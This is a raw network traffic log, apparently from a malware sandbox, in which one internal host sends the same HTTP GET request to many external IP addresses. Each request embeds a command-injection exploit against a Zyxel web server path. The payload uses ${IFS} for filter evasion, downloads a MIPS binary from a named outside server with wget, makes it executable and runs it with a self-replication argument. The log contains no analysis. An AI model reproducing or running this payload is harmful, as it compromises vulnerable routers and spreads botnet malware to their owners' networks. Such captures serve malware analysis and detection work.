                                                Jan 12, 2024 18:16:09.124669075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                928192.168.2.233963286.134.233.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124700069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                929192.168.2.2356566142.134.81.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124756098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                930192.168.2.2358878206.230.164.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124794006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                931192.168.2.2338588120.110.138.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124830008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                932192.168.2.2359782148.118.112.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124865055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                933192.168.2.2359464174.35.24.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124933958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                934192.168.2.233997646.156.53.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124979973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                935192.168.2.2337240123.3.69.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125005007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                936192.168.2.234572848.241.174.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125036001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                937192.168.2.2343888115.21.152.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125073910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                938192.168.2.234142454.42.169.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125092983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                939192.168.2.2337564173.145.111.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125144005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                940192.168.2.2354546205.253.145.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125186920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                941192.168.2.23573868.126.194.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125211954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                942192.168.2.233973462.255.60.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.125248909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource Port